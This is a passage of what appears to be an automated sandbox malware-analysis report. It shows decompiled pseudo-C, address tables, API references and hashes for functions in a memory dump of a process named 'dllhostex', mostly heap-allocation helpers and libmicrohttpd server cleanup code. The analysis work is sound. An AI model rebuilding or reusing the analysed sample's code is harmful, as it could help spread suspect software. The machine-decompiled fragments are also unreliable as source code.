						 *((intOrPtr*)(_t38 + 8)) = _t25;
						 *((intOrPtr*)(_t38 + 4)) = _t34;
						 *_t38 = _t34;
						 *((intOrPtr*)(_t38 + 0x18)) = _t25;
						goto L10;
					}
					_t37 = 0x13d526c;
					goto L6;
				}
				return 0;
			}











                                                0x013669f4
                                                0x01366a07
                                                0x01366a14
                                                0x01366a1c
                                                0x01366a1f
                                                0x01366a31
                                                0x01366a9c
                                                0x01366a9c
                                                0x01366a9e
                                                0x00000000
                                                0x01366a9f
                                                0x01366a33
                                                0x01366a38
                                                0x01366a38
                                                0x01366a3e
                                                0x01366a3e
                                                0x01366a48
                                                0x00000000
                                                0x00000000
                                                0x01366a4f
                                                0x01366a52
                                                0x01366a56
                                                0x01366a85
                                                0x01366a85
                                                0x01366a8a
                                                0x01366a8c
                                                0x01366a93
                                                0x01366a81
                                                0x01366a81
                                                0x00000000
                                                0x01366a81
                                                0x01366a5d
                                                0x01366a64
                                                0x01366a66
                                                0x01366a6b
                                                0x01366a71
                                                0x00000000
                                                0x00000000
                                                0x01366a73
                                                0x01366a73
                                                0x01366a76
                                                0x01366a79
                                                0x01366a7c
                                                0x01366a7e
                                                0x00000000
                                                0x01366a7e
                                                0x01366a21
                                                0x00000000
                                                0x01366a21
                                                0x00000000

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: 9cf9f44ec78d071c0dcd4b2734b83130d7a0e47d8d88f0ed8d48708d481702fc
                                                • Instruction ID: e633762f3a1984ba6a0e50da89247b4b2eac2a5843a50fdc7ea06541fdd41ff7
                                                • Opcode Fuzzy Hash: 9cf9f44ec78d071c0dcd4b2734b83130d7a0e47d8d88f0ed8d48708d481702fc
                                                • Instruction Fuzzy Hash: A911B4F11053029FE720DF2EE442B5AB7ECEF143ACB20C42EE84AC7649EA71E4448750
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01366CCA Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 351 1366cca-1366cd5 352 1366cd7-1366ce1 351->352 353 1366ce3-1366ce9 351->353 352->353 354 1366d17-1366d22 call 135eb5c 352->354 355 1366d02-1366d13 RtlAllocateHeap 353->355 356 1366ceb-1366cec 353->356 360 1366d24-1366d26 354->360 357 1366d15 355->357 358 1366cee-1366cf5 call 1365357 355->358 356->355 357->360 358->354 364 1366cf7-1366d00 call 1362eb9 358->364 364->354 364->355
                                                C-Code - Quality: 95%
                                                			E01366CCA(void* __ecx, signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x13d5654, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E01365357();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E0135EB5C())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E01362EB9(_t15, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}









                                                0x01366cca
                                                0x01366cd0
                                                0x01366cd5
                                                0x01366ce3
                                                0x01366ce3
                                                0x01366ce9
                                                0x01366ceb
                                                0x01366ceb
                                                0x01366d02
                                                0x01366d0b
                                                0x01366d13
                                                0x00000000
                                                0x00000000
                                                0x01366cf3
                                                0x01366cf5
                                                0x01366d17
                                                0x01366d1c
                                                0x01366d22
                                                0x00000000
                                                0x01366d22
                                                0x01366cf8
                                                0x01366cfd
                                                0x01366cfe
                                                0x01366d00
                                                0x00000000
                                                0x00000000
                                                0x01366d00
                                                0x00000000
                                                0x01366d02
                                                0x01366cdb
                                                0x01366ce1
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000008,?,?,?,01365EBC,00000001,00000364,00000006,000000FF,?,4132269F,0135EB61,01365708,?,?,01363C72), ref: 01366D0B
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 93ed170cb1514a653820da9926cef7ac581af888a21f018e436c7cb06a3bccc3
                                                • Instruction ID: 5fa76d2684622b6b3f41f0adb98629f87830d82039a306b79481132d6c59be2f
                                                • Opcode Fuzzy Hash: 93ed170cb1514a653820da9926cef7ac581af888a21f018e436c7cb06a3bccc3
                                                • Instruction Fuzzy Hash: 0EF0B4B15459256BEB215F2AD802B5A7F5CAB607F9F14C021AD089B19CCA60E84086E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0136571C Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 367 136571c-1365728 368 136575a-1365765 call 135eb5c 367->368 369 136572a-136572c 367->369 376 1365767-1365769 368->376 371 1365745-1365756 RtlAllocateHeap 369->371 372 136572e-136572f 369->372 373 1365731-1365738 call 1365357 371->373 374 1365758 371->374 372->371 373->368 379 136573a-1365743 call 1362eb9 373->379 374->376 379->368 379->371
                                                C-Code - Quality: 94%
                                                			E0136571C(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E0135EB5C())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x13d5654, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E01365357();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E01362EB9(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}







                                                0x0136571c
                                                0x01365722
                                                0x01365728
                                                0x0136575a
                                                0x0136575f
                                                0x01365765
                                                0x00000000
                                                0x01365765
                                                0x0136572c
                                                0x0136572e
                                                0x0136572e
                                                0x01365745
                                                0x0136574e
                                                0x01365756
                                                0x00000000
                                                0x00000000
                                                0x01365736
                                                0x01365738
                                                0x00000000
                                                0x00000000
                                                0x0136573b
                                                0x01365740
                                                0x01365741
                                                0x01365743
                                                0x00000000
                                                0x00000000
                                                0x01365743
                                                0x00000000

                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000000,?,?,?,01353742,?,?,01297737,00000018,01291009), ref: 0136574E
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 1f69097e89ee31c953c59627a1f2a34ec8daf0846c9f207f07979066fcaec728
                                                • Instruction ID: 78a4813f76e80461ea19a5ec9dbdb043da6bd099880f4da2043af830bd27881a
                                                • Opcode Fuzzy Hash: 1f69097e89ee31c953c59627a1f2a34ec8daf0846c9f207f07979066fcaec728
                                                • Instruction Fuzzy Hash: 14E0ED31146225EAE6322A2DAC00B5B3B5CAB217FBF05C030AE1596188DE6CC80086B0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 01347F80 Relevance: 4.6, APIs: 3, Instructions: 115networkfilenativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 51%
                                                			E01347F80(void* __ecx, long __edx, void* __edi) {
				signed int _v8;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void _v44;
				signed int _v48;
				void* __esi;
				signed int _t36;
				signed int _t38;
				signed int _t46;
				long _t49;
				signed int _t54;
				signed int _t56;
				void* _t69;
				signed int _t76;
				long _t80;

				_t82 =  &_v44;
				_t36 =  *0x13cc074; // 0x4132269f
				_v8 = _t36 ^  &_v44;
				_t80 = __edx;
				_t69 = __ecx;
				_t38 =  *(__edx + 0x2c);
				_t54 = _t38;
				 *((char*)(__edx + 0xfc)) = 0;
				_t76 = _t54 & 0x0000000c;
				if((_t38 & 0x01000000) != 0) {
					if(_t76 != 0xc) {
						 *((intOrPtr*)( *((intOrPtr*)(__edx + 4)) + 4)) =  *((intOrPtr*)( *((intOrPtr*)(__edx + 4)) + 4)) + 1;
						_t54 =  *(__edx + 0x2c);
					}
					_t56 = _t54 & 0xfffffffb | 0x00000001;
					 *(_t80 + 0x2c) = _t56;
					if( *((char*)(_t80 + 0xf8)) == 0 &&  *((char*)(_t80 + 0xf9)) == 0) {
						goto L17;
					}
					goto L19;
				} else {
					if(_t76 != 0xc) {
						 *((intOrPtr*)( *((intOrPtr*)(__edx + 4)) + 4)) =  *((intOrPtr*)( *((intOrPtr*)(__edx + 4)) + 4)) + 1;
						_t54 =  *(__edx + 0x2c);
					}
					_t56 = _t54 & 0xfffffffb | 0x00000001;
					 *(_t80 + 0x2c) = _t56;
					if( *((char*)(_t80 + 0xf8)) != 0 ||  *((char*)(_t80 + 0xf9)) != 0) {
						_v32 = 1;
						_v36 = 1;
						_v44 = 0xffffffff;
						_v40 = 0x7fffffff;
						_v28 =  *(_t80 + 0x34);
						_v20 = 0;
						_v24 = 0x7ff;
						E01344380(0x13d5c40, 0x1347aa0, _t80);
						_t46 =  *0x13d5c1c; // 0x0
						 *0x13d5c0c = 0x103;
						_t73 =  ==  ? _t46 : _t46 & 0xfffffffe;
						_t48 =  !=  ? 0 : 0x13d5c0c;
						_t49 = NtDeviceIoControlFile( *(_t80 + 0x34),  ==  ? _t46 : _t46 & 0xfffffffe, 0,  !=  ? 0 : 0x13d5c0c, 0x13d5c0c, 0x12024,  &_v44, 0x20, 0x13d5c20, 0x20);
						if(_t49 == 0) {
							_t80 = 0;
						} else {
							if(_t49 == 0x103) {
								_t80 = 0x3e5;
							} else {
								_t49 = E013483B0(_t49);
								_t80 = _t49;
							}
						}
						__imp__#112(_t80);
						if(_t80 == 0) {
							goto L19;
						} else {
							__imp__#111();
							if(_t49 != 0x3e5) {
								goto L20;
							} else {
								return E01353717(_v48 ^ _t82, _t80);
							}
						}
					} else {
						L17:
						if((_t56 & 0x00000020) == 0) {
							 *(_t80 + 0x2c) = _t56 | 0x00000020;
							 *(_t80 + 0x28) =  *(_t69 + 0x2c);
							 *(_t69 + 0x2c) = _t80;
						}
						L19:
						L20:
						return E01353717(_v8 ^ _t82, _t80);
					}
				}
			}






















                                                0x01347f80
                                                0x01347f83
                                                0x01347f8a
                                                0x01347f8f
                                                0x01347f91
                                                0x01347f94
                                                0x01347f97
                                                0x01347f9b
                                                0x01347fa2
                                                0x01347faa
                                                0x013480bd
                                                0x013480c2
                                                0x013480c5
                                                0x013480c5
                                                0x013480cb
                                                0x013480d5
                                                0x013480d8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01347fb0
                                                0x01347fb3
                                                0x01347fb8
                                                0x01347fbb
                                                0x01347fbb
                                                0x01347fc1
                                                0x01347fcb
                                                0x01347fce
                                                0x01347fea
                                                0x01347ff2
                                                0x01347ffa
                                                0x01348002
                                                0x0134800a
                                                0x0134800e
                                                0x01348016
                                                0x0134801e
                                                0x01348023
                                                0x01348034
                                                0x01348048
                                                0x01348063
                                                0x0134806a
                                                0x01348072
                                                0x0134808d
                                                0x01348074
                                                0x01348079
                                                0x01348086
                                                0x0134807b
                                                0x0134807d
                                                0x01348082
                                                0x01348082
                                                0x01348079
                                                0x01348090
                                                0x01348098
                                                0x00000000
                                                0x0134809a
                                                0x0134809a
                                                0x013480a5
                                                0x00000000
                                                0x013480a7
                                                0x013480b9
                                                0x013480b9
                                                0x013480a5
                                                0x013480e3
                                                0x013480e3
                                                0x013480e6
                                                0x013480eb
                                                0x013480f1
                                                0x013480f4
                                                0x013480f4
                                                0x013480f7
                                                0x013480f9
                                                0x01348109
                                                0x01348109
                                                0x01347fce

                                                APIs
                                                • NtDeviceIoControlFile.NTDLL(?,00000000,00000000,013D5C0C,013D5C0C,00012024,00000001,00000020,013D5C20,00000020), ref: 0134806A
                                                • WSASetLastError.WS2_32(00000000), ref: 01348090
                                                • WSAGetLastError.WS2_32 ref: 0134809A
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$ControlDeviceFile
                                                • String ID:
                                                • API String ID: 1013958653-0
                                                • Opcode ID: a4bcc77d5fac70b01e406b3e319f20c87ac8ab177a76aa7626d1c6ceb508e229
                                                • Instruction ID: 5d762145ce81f1ce6259f4701754ba62478c9aff70abf3cb3cc1d53d93fcd586
                                                • Opcode Fuzzy Hash: a4bcc77d5fac70b01e406b3e319f20c87ac8ab177a76aa7626d1c6ceb508e229
                                                • Instruction Fuzzy Hash: DF41E671A107419FE735CF3DD444B2BBBE5EB88718F048A5DE9AAC72C1D7B0A8448B81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0134D150 Relevance: 72.1, APIs: 14, Strings: 27, Instructions: 356networksynchronizationCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 19%
                                                			E0134D150(void* __ebx, signed int __ecx, void* __edx, void* __edi) {
				signed int _v4;
				signed int _v8;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				long _v48;
				signed int __esi;
				signed int _t171;
				signed int _t174;
				long* _t176;
				long _t177;
				long _t178;
				void* _t181;
				long _t182;
				signed int _t190;
				signed int _t194;
				signed int _t197;
				signed int _t198;
				void* _t208;
				struct _CRITICAL_SECTION* _t217;
				signed int _t218;
				intOrPtr _t220;
				signed int _t224;
				signed int _t226;
				signed int _t228;
				signed int _t237;
				signed int _t239;
				signed int _t244;
				signed int _t246;
				signed int _t250;
				signed int _t254;
				void* _t255;
				signed int _t258;
				signed int _t265;
				signed int _t270;
				signed int _t271;
				intOrPtr* _t274;
				signed int _t278;
				long _t279;
				long _t280;
				intOrPtr* _t281;
				signed int _t283;
				signed int _t285;
				signed int _t287;
				void* _t293;
				signed int _t294;
				signed int* _t298;
				signed int _t300;
				signed int _t301;
				signed int _t303;
				signed int _t310;
				signed int _t312;
				long* _t313;
				signed int _t315;
				signed int _t317;
				signed int _t322;
				signed int _t324;
				intOrPtr* _t327;
				struct _CRITICAL_SECTION* _t329;
				void* _t335;
				void* _t337;
				signed int _t339;
				signed int _t342;
				void* _t343;
				signed int _t344;
				signed int _t345;
				void* _t347;
				void* _t351;
				void* _t352;
				signed int _t356;
				signed int _t357;

				_t299 = __edi;
				_t293 = __edx;
				_t344 = _t343 - 0xc;
				_push(__ebx);
				_push(_t327);
				_t312 = __ecx;
				_push(__edi);
				_t171 =  *(__ecx + 0xe4);
				_t278 = _t171 >> 0x00000002 & 0xffffff01;
				_t265 = _t171 >> 0x0000000f & 0xffffff01;
				_v8 = _t278;
				_v4 = _t265;
				if((_t171 & 0x00002000) != 0) {
					__ecx = __esi;
					 *((char*)(__esi + 0xc7)) = 1;
					__eax = E0134A8B0(__ebx, __ecx, __edx, __edi);
				}
				EnterCriticalSection(_t312 + 0x9c);
				__eflags = _t265;
				if(_t265 == 0) {
					L96:
					__eflags =  *(_t312 + 0x10);
					if( *(_t312 + 0x10) == 0) {
						goto L82;
					} else {
						 *0x13d5870( *0x13d5874, "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c", 0x183d, "MHD_stop_daemon() called while we have suspended connections.\n");
						_t344 = _t344 + 0x10;
						goto L98;
					}
				} else {
					_t300 =  *(_t312 + 0x14);
					__eflags = _t300;
					if(_t300 == 0) {
						L82:
						_t300 =  *(_t312 + 0xc);
						__eflags = _t300;
						if(_t300 == 0) {
							L89:
							__eflags = _v8;
							_t265 = LeaveCriticalSection;
							if(_v8 == 0) {
								goto L102;
							} else {
								_t300 =  *(_t312 + 0xc);
								__eflags = _t300;
								if(_t300 == 0) {
									goto L102;
								} else {
									_t327 = CloseHandle;
									goto L92;
								}
							}
						} else {
							_t265 = __imp__#22;
							_t327 = __imp__#111;
							do {
								_t254 =  *_t265( *((intOrPtr*)(_t300 + 0xa0)), 2);
								__eflags =  *(_t312 + 0xe4) & 0x00000004;
								if(( *(_t312 + 0xe4) & 0x00000004) == 0) {
									goto L88;
								} else {
									__eflags =  *((intOrPtr*)(_t312 + 0xbc)) - 0xffffffff;
									if( *((intOrPtr*)(_t312 + 0xbc)) == 0xffffffff) {
										goto L88;
									} else {
										__imp__#19( *((intOrPtr*)(_t312 + 0xc0)), "e", 1, 0);
										__eflags = _t254;
										if(_t254 > 0) {
											goto L88;
										} else {
											_t255 =  *_t327();
											__eflags = _t255 - 0x2733;
											if(_t255 != 0x2733) {
												L98:
												 *0x13d5870( *0x13d5874, "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c", 0x1846, "Failed to signal shutdown via inter-thread communication channel");
												_t344 = _t344 + 0x10;
												L99:
												_t300 =  *(_t300 + 4);
												L100:
												__eflags = _t300;
												if(_t300 != 0) {
													L92:
													__eflags =  *((char*)(_t300 + 0xa6));
													if( *((char*)(_t300 + 0xa6)) != 0) {
														goto L99;
													} else {
														LeaveCriticalSection(_t312 + 0x9c);
														_t250 = WaitForSingleObject( *(_t300 + 0x50), 0xffffffff);
														__eflags = _t250;
														if(_t250 != 0) {
															 *0x13d5870( *0x13d5874, "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c", 0x1854, "Failed to join a thread\n");
															_t344 = _t344 + 0x10;
															goto L111;
														} else {
															CloseHandle( *(_t300 + 0x50));
															EnterCriticalSection(_t312 + 0x9c);
															 *((char*)(_t300 + 0xa6)) = 1;
															_t300 =  *(_t312 + 0xc);
															goto L100;
														}
													}
												} else {
													L102:
													LeaveCriticalSection(_t312 + 0x9c);
													__eflags = _v4;
													if(_v4 != 0) {
														_t278 = _t312;
														 *((char*)(_t312 + 0xc7)) = 1;
														E0134A8B0(_t265, _t278, _t293, _t300);
													}
													_t174 =  *(_t312 + 0xc);
													__eflags = _t174;
													if(_t174 == 0) {
														L109:
														_t278 = _t312;
														_pop(_t312);
														_pop(_t327);
														_pop(_t265);
														_t344 = _t344 + 0xc;
														_push(_t327);
														_t345 = _t344 & 0xfffffff8;
														_push(_t265);
														_push(_t344);
														_push(_t312);
														_t301 = _t278;
														_t329 = _t301 + 0x9c;
														EnterCriticalSection(_t329);
														_t313 =  *(_t301 + 0x1c);
														_t294 = LeaveCriticalSection;
														if(_t313 == 0) {
															L34:
															return  *_t294(_t329);
														} else {
															_t176 = _t313;
															while(1) {
																_t279 =  *_t313;
																if(_t279 == 0 && _t313 != _t176) {
																	break;
																}
																_t177 = _t313[1];
																if(_t177 != 0) {
																	L9:
																	 *_t177 = _t279;
																	goto L10;
																} else {
																	if(_t313 !=  *(_t301 + 0x18)) {
																		_push("(NULL != (pos)->prev) || ((pos) == (daemon->cleanup_head))");
																		_push(0xbd9);
																		_push("c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c");
																		_push("%s:%u Assertion failed: %s\nProgram aborted.\n");
																		L39:
																		_push(E0135B8FA(2));
																		E012938B0(_t280);
																		E0135D32E(_t280, E0135B8FA(2));
																		_t351 = _t345 + 0x20;
																		E0135EBB9(_t265, _t280, _t294, _t301, _t313);
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		_t352 = _t351 - 0x14;
																		__eflags =  *(_t280 + 0xe4) & 0x00000004;
																		_t190 = _t294;
																		_push(_t265);
																		_push(_t329);
																		_push(_t313);
																		_push(_t301);
																		_v44 = _t190;
																		_v48 = _t280;
																		if(( *(_t280 + 0xe4) & 0x00000004) == 0) {
																			__eflags =  *((char*)(_t280 + 0xc8));
																			if( *((char*)(_t280 + 0xc8)) == 0) {
																				_t283 =  *(_t280 + 0x2c);
																				asm("xorps xmm0, xmm0");
																				asm("movlpd [esp+0x18], xmm0");
																				_t191 = 0;
																				_t303 = _v36;
																				_t315 = _v40;
																				__eflags = _t283;
																				while(_t283 != 0) {
																					_t271 =  *(_t283 + 0x90);
																					_t294 =  *(_t283 + 0x94);
																					__eflags = _t271;
																					if(_t271 != 0) {
																						L48:
																						__eflags = _t191;
																						if(_t191 == 0) {
																							L52:
																							_t303 =  *(_t283 + 0x8c);
																							_t315 =  *((intOrPtr*)(_t283 + 0x88)) + _t271;
																							asm("adc edi, edx");
																						} else {
																							_t337 = _t315 -  *((intOrPtr*)(_t283 + 0x88));
																							asm("sbb eax, [ecx+0x8c]");
																							__eflags = _t303 - _t294;
																							if(__eflags >= 0) {
																								if(__eflags > 0) {
																									goto L52;
																								} else {
																									__eflags = _t337 - _t271;
																									if(_t337 > _t271) {
																										goto L52;
																									}
																								}
																							}
																						}
																						_t191 = 1;
																					} else {
																						__eflags = _t294;
																						if(_t294 != 0) {
																							goto L48;
																						}
																					}
																					_t283 =  *(_t283 + 0xc);
																					__eflags = _t283;
																				}
																				_t285 =  *(_v48 + 0x24);
																				__eflags = _t285;
																				if(_t285 == 0) {
																					L63:
																					__eflags = _t191;
																					if(_t191 == 0) {
																						goto L42;
																					} else {
																						goto L64;
																					}
																				} else {
																					_t270 =  *(_t285 + 0x90);
																					_t294 =  *(_t285 + 0x94);
																					__eflags = _t270;
																					if(_t270 != 0) {
																						L58:
																						__eflags = _t191;
																						if(_t191 == 0) {
																							L62:
																							_t303 =  *(_t285 + 0x8c);
																							_t315 =  *((intOrPtr*)(_t285 + 0x88)) + _t270;
																							asm("adc edi, edx");
																						} else {
																							_t191 = _t303;
																							_t335 = _t315 - _t270;
																							asm("sbb eax, edx");
																							__eflags = _t303 -  *(_t285 + 0x8c);
																							if(__eflags >= 0) {
																								if(__eflags > 0) {
																									goto L62;
																								} else {
																									__eflags = _t335 -  *((intOrPtr*)(_t285 + 0x88));
																									if(_t335 >  *((intOrPtr*)(_t285 + 0x88))) {
																										goto L62;
																									}
																								}
																							}
																						}
																						L64:
																						__imp__GetTickCount64();
																						asm("sbb edx, [0x13d5ce4]");
																						_t194 = E01354180(_t191 -  *0x13d5ce0, _t294, 0x3e8, 0);
																						__eflags = _t303 - _t294;
																						if(__eflags > 0) {
																							L68:
																							_t317 = _t315 - _t194;
																							asm("sbb edi, edx");
																							__eflags = _t303 - 0x418937;
																							if(__eflags < 0) {
																								L72:
																								_t197 = _t317;
																								_t198 = _t197 * 0x3e8;
																								_t287 = _t303 * 0x3e8 + (_t197 * 0x3e8 >> 0x20);
																								__eflags = _t287;
																							} else {
																								if(__eflags > 0) {
																									L71:
																									_t198 = _t194 | 0xffffffff;
																									_t287 = _t285 | 0xffffffff;
																								} else {
																									__eflags = _t317 - 0x4bc6a7ef;
																									if(_t317 <= 0x4bc6a7ef) {
																										goto L72;
																									} else {
																										goto L71;
																									}
																								}
																							}
																						} else {
																							if(__eflags < 0) {
																								L67:
																								asm("xorps xmm0, xmm0");
																								asm("movlpd [esp+0x18], xmm0");
																								_t287 = _v36;
																								_t198 = _v40;
																							} else {
																								__eflags = _t315 - _t194;
																								if(_t315 >= _t194) {
																									goto L68;
																								} else {
																									goto L67;
																								}
																							}
																						}
																						_t298 = _v44;
																						 *_t298 = _t198;
																						_t298[1] = _t287;
																						return 1;
																					} else {
																						__eflags = _t294;
																						if(_t294 == 0) {
																							goto L63;
																						} else {
																							goto L58;
																						}
																					}
																				}
																			} else {
																				 *_t190 = 0;
																				 *(_t190 + 4) = 0;
																				return 1;
																			}
																		} else {
																			_push("Illegal call to MHD_get_timeout\n");
																			_push(_t280);
																			E01351E90();
																			_t352 = _t352 + 8;
																			L42:
																			__eflags = 0;
																			return 0;
																		}
																	} else {
																		if(_t177 != 0) {
																			goto L9;
																		} else {
																			 *(_t301 + 0x18) = _t279;
																		}
																		L10:
																		_t280 =  *_t313;
																		_t178 = _t313[1];
																		if(_t280 != 0) {
																			 *(_t280 + 4) = _t178;
																		} else {
																			 *(_t301 + 0x1c) = _t178;
																		}
																		 *_t313 = 0;
																		_t313[1] = 0;
																		 *_t294(_t329);
																		if(( *(_t301 + 0xe4) & 0x00000004) == 0 || _t313[0x29] != 0) {
																			L17:
																			_t180 = _t313[0x36];
																			if(_t313[0x36] != 0) {
																				_t313[0x36] = 0;
																				E0135C9E5(_t180);
																				_t345 = _t345 + 4;
																			}
																			_t265 = _t313[8];
																			if(_t265 != 0) {
																				_t208 =  *_t265;
																				if( *((intOrPtr*)(_t265 + 0x10)) != 0) {
																					VirtualFree(_t208, 0, 0x8000);
																				} else {
																					E0135C9E5(_t208);
																					_t345 = _t345 + 4;
																				}
																				E0135C9E5(_t265);
																				_t345 = _t345 + 4;
																			}
																			_t281 =  *((intOrPtr*)(_t301 + 0x40));
																			if(_t281 != 0) {
																				 *_t281( *((intOrPtr*)(_t301 + 0x44)), _t313,  &(_t313[0xa]), 1);
																				_t345 = _t345 + 0x10;
																			}
																			_t181 = E013490A0(_t265, _t301, _t313[0x13], _t301, _t329, _t313[0x21]);
																			_t280 = _t313[7];
																			_t347 = _t345 + 4;
																			if(_t280 != 0) {
																				E0134D9F0(_t181, _t280);
																				_t313[7] = 0;
																			}
																			_t182 = _t313[0x28];
																			if(_t182 == 0xffffffff) {
																				L30:
																				_t183 = _t313[0x13];
																				if(_t313[0x13] != 0) {
																					E0135C9E5(_t183);
																					_t347 = _t347 + 4;
																				}
																				E0135C9E5(_t313);
																				_t345 = _t347 + 4;
																				EnterCriticalSection(_t329);
																				 *((intOrPtr*)(_t301 + 0xcc)) =  *((intOrPtr*)(_t301 + 0xcc)) - 1;
																				_t294 = LeaveCriticalSection;
																				 *((char*)(_t301 + 0xc6)) = 0;
																				_t313 =  *(_t301 + 0x1c);
																				_t176 = _t313;
																				if(_t313 != 0) {
																					continue;
																				} else {
																					goto L34;
																				}
																			} else {
																				__imp__#3(_t182);
